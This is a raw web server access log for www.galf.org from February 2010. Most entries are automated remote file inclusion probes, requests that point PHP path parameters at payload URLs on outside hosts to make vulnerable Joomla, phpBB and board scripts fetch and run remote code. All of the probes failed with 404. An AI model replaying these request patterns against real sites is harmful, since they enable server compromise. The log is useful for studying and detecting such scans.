112.78.112.81 - - [15/Feb/2010:02:46:51 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:46:51 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [15/Feb/2010:02:51:12 -0800] "GET /write_comment_update.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [15/Feb/2010:02:51:12 -0800] "GET /logs/access.log/write_comment_update.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [15/Feb/2010:02:51:12 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:02:51:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:02:51:22 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:52:46 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:02:53:21 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:02:53:21 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:02:53:39 -0800] "GET /logs/access_100111.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:55:20 -0800] "GET /logs/access_100201.log//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:55:20 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [15/Feb/2010:02:56:05 -0800] "GET /logs//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [15/Feb/2010:02:56:05 -0800] "GET /index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [15/Feb/2010:02:56:05 -0800] "GET /logs/access_100118.log//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:56:09 -0800] "GET /logs/access_100201.log//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [15/Feb/2010:02:56:11 -0800] "GET /index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [15/Feb/2010:02:56:11 -0800] "GET /logs//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [15/Feb/2010:02:56:11 -0800] "GET /logs/access_100118.log//index.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:56:23 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [15/Feb/2010:03:03:04 -0800] "GET /logs/access.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
60.251.165.181 - - [15/Feb/2010:03:03:05 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
60.251.165.181 - - [15/Feb/2010:03:03:06 -0800] "GET /logs/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:04:38 -0800] "GET /logs/access_091228.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:04:38 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:04:38 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:05:02 -0800] "GET /logs/access_091228.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:05:02 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:05:02 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.162.204 - - [15/Feb/2010:03:05:24 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.ro/search?hl=ro&source=hp&q=index+of+%2Flogs&meta=&aq=f&oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
217.73.162.204 - - [15/Feb/2010:03:05:30 -0800] "GET /logs/access.log HTTP/1.1" 200 480936 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:03:05:54 -0800] "GET /myevent.php?myevent_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:03:05:54 -0800] "GET /logs/myevent.php?myevent_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:03:05:54 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:03:05:55 -0800] "GET /myevent.php?myevent_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:03:05:55 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:03:05:55 -0800] "GET /logs/myevent.php?myevent_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [15/Feb/2010:03:06:06 -0800] "GET /write_comment_update.php?board_skin_path=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [15/Feb/2010:03:06:06 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:03:06:12 -0800] "GET /logs/myevent.php?myevent_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:03:06:12 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:03:06:12 -0800] "GET /myevent.php?myevent_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [15/Feb/2010:03:06:16 -0800] "GET /logs/access.log%20%20/write_comment_update.php?board_skin_path=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:03:06:36 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:03:06:42 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
205.205.227.101 - - [15/Feb/2010:03:07:03 -0800] "GET /index.php?_zb_path=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
205.205.227.101 - - [15/Feb/2010:03:07:03 -0800] "GET /logs/access_100118.log%20%20//index.php?_zb_path=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
205.205.227.101 - - [15/Feb/2010:03:07:03 -0800] "GET /logs//index.php?_zb_path=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:07:30 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:07:59 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [15/Feb/2010:03:08:09 -0800] "GET /logs/access_100111.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [15/Feb/2010:03:08:43 -0800] "GET /com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:10:08 -0800] "GET /logs/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:10:08 -0800] "GET /index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:10:08 -0800] "GET /logs/access_090803.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:10:18 -0800] "GET /logs/access_090803.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:10:18 -0800] "GET /index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:10:18 -0800] "GET /logs/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:10:27 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:10:27 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:10:27 -0800] "GET /logs/access_100125.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:10:29 -0800] "GET /index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:10:29 -0800] "GET /logs/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:10:29 -0800] "GET /logs/access_090803.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:10:30 -0800] "GET /logs/access_091228.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:11:35 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:11:35 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:11:35 -0800] "GET /logs/access_100125.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [15/Feb/2010:03:11:38 -0800] "GET /logs/access_091228.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:11:45 -0800] "GET /index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:11:46 -0800] "GET /logs/access_090803.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:11:46 -0800] "GET /logs/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:12:40 -0800] "GET /index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:12:40 -0800] "GET /logs/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:12:40 -0800] "GET /logs/access_090803.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [15/Feb/2010:03:13:06 -0800] "GET /conf.pollxt.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:13:10 -0800] "GET /logs/access_090831.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:13:28 -0800] "GET /logs/access_100111.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:13:31 -0800] "GET /functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:13:35 -0800] "GET /logs//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.143.29.250 - - [15/Feb/2010:03:13:36 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [15/Feb/2010:03:13:36 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [15/Feb/2010:03:13:59 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:14:07 -0800] "GET /logs/access_090831.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:14:12 -0800] "GET /logs/access_090831.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:14:52 -0800] "GET /logs/access_090831.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:03:15:42 -0800] "GET /logs/access_090831.log%20%20/index.php?sayfa=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.161.133.1 - - [15/Feb/2010:03:15:44 -0800] "GET /logs/access_100201.log%20%20/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.161.133.1 - - [15/Feb/2010:03:15:44 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.161.133.1 - - [15/Feb/2010:03:15:44 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [15/Feb/2010:03:16:45 -0800] "GET /mambatstaff.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:17:33 -0800] "GET /logs/access_100111.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:17:33 -0800] "GET /functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:17:33 -0800] "GET /logs//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:17:46 -0800] "GET /logs/access_091207.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:33 -0800] "GET /logs/access_090713.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:38 -0800] "GET /logs/access_091214.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:42 -0800] "GET /logs/access_100118.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:47 -0800] "GET /logs/access_091221.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:47 -0800] "GET /logs/access_090720.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:47 -0800] "GET /logs/access_091228.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:48 -0800] "GET /logs/access_100125.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:55 -0800] "GET /logs/access.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:55 -0800] "GET /logs/access_090928.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:55 -0800] "GET /logs/access_090831.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:18:55 -0800] "GET /logs/access_090824.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:19:37 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:19:37 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:19:37 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
